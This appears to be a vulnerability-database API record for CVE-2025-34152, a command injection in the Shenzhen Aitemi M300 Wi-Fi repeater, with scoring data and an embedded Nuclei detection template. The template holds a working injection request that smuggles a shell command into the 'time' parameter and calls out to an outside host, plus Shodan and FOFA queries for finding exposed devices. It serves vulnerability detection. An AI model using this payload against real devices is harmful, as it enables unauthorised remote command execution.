{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-34152/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-34152/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-34152/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-34152/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-34152/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-34152"},"sightings":{"href":"/api/v1/sightings/cve-2025-34152"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.68599,"kev":false,"percentile":0.99317},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-34152.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-34152\n\ninfo:\n  name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated Remote Command Execution via `time` Parameter\n  author: Chocapikk,DhiyaneshDk\n  severity: critical\n  description: |\n    An unauthenticated OS command injection vulnerability exists in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) via the 'time' parameter of the '/protocol.csp?' endpoint. The input is processed by the internal date '-s' command without rebooting or disrupting HTTP service. Unlike other injection points, this vector allows remote compromise without triggering visible configuration changes.\n  impact: |\n    Unauthenticated attackers can execute arbitrary operating system commands through the time parameter in the protocol.csp endpoint without disrupting device operation.\n  remediation: |\n    Update Shenzhen Aitemi M300 Wi-Fi Repeater firmware to the latest version that properly sanitizes the time parameter.\n  reference:\n    - https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/\n    - https://github.com/rapid7/metasploit-framework/pull/20455/files\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-34152\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:-741058468 \"lighttpd/1.4.32\"\n    fofa-query: icon_hash=\"-741058468\" && server==\"lighttpd/1.4.32\"\n  tags: cve,cve2025,aitemi,m300,wifi,unauth,rce,vkev,vuln\n\nvariables:\n  payload: \"`$(nslookup {{interactsh-url}})`\"\n\nhttp:\n  - raw:\n      - |\n        POST /protocol.csp?x HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Requested-With: XMLHttpRequest\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/network.html\n\n        fname=system&opt=time_conf&function=set&time={{url_encode(payload)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains_all(body, \"error\",\"opt\")'\n          - 'contains(content_type, \"text/plain\")'\n        condition: and\n# digest: 480a00453043021f1828ab8dcca19cc8156d4ac128faadd537a2618478d157d063634dfce3a6c202205986d115d00ff5752de13a2cc578b58e533402d5b6dd8294fe18bf45e3ec0863:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-34152"}